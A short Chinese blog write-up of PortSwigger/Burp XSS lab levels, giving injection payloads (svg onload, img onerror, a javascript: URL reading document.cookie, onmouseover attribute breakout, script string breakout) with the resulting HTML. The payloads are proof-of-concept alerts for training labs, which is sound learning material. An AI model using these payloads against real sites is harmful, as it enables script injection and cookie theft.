XSS-burp靶场

2024-04-11  本文已影响0人  _Irving

第三关 "><svg onload=alert(1)>

<img src="/resources/images/tracker.gif?searchTerms=xx">
我们先进行闭合:
"><svg onload=alert(1)>

第四关:<img src=1 onerror=alert(1)>

首先也是在搜索框录入aaaa,f12查看出现位置如下:
<span id="searchMessage">aaaaaaa</span>
搜索框录入:<img src=1 onerror=alert(1)>
该src属性的值无效并引发错误。这会触发onerror事件处理程序,然后调用该alert()函数。因此,每当用户的浏览器尝试加载包含恶意帖子的页面时,就会执行有效负载。
搜索后,f12查看如下:
<span id="searchMessage"><img src="1" onerror="alert(123)"></span>

第五关:javascript:alert(document.cookie)

image.png
在提交反馈页面上,将查询参数更改returnPath为/后跟随机字母数字字符串。
右键单击并检查该元素,并观察您的随机字符串已放置在 ahref属性内。
改成returnPath:
javascript:alert(document.cookie)
按 Enter 键并单击“返回”。

<div class="is-linkback">
      <a id="backLink" href="javascript:alert(document.cookie)">Back</a>
</div>
点击页面的back触发

第七关:"onmouseover="alert(1)

第七关会对><进行html编码,我们录入aaa查看,其出现在input标签的带引号的属性值中,于是创造一个onmouseover属性,鼠标移动到其上调用属性值
前面的引号是为了闭合前面的属性值
"onmouseover="alert(1)

第九关:';alert(1);//

录入aaaa查询其出现的位置,我们看到如下的位置:
<script>
      var searchTerms = 'aaaa';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
所以我们录入';alert(1);//
查询后f12结果就变成这样:
<script>
       var searchTerms = '';
       alert(1);//';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">')
</script>
上一篇 下一篇

猜你喜欢

热点阅读